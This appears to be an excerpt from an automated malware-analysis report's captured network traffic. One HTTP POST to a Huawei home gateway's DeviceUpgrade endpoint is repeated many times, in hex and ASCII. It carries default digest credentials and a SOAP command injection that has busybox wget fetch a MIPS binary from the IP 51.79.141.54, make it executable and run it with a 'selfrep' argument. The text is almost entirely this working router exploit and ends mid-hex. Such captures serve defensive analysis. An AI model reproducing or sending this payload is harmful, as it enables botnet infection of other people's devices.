6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 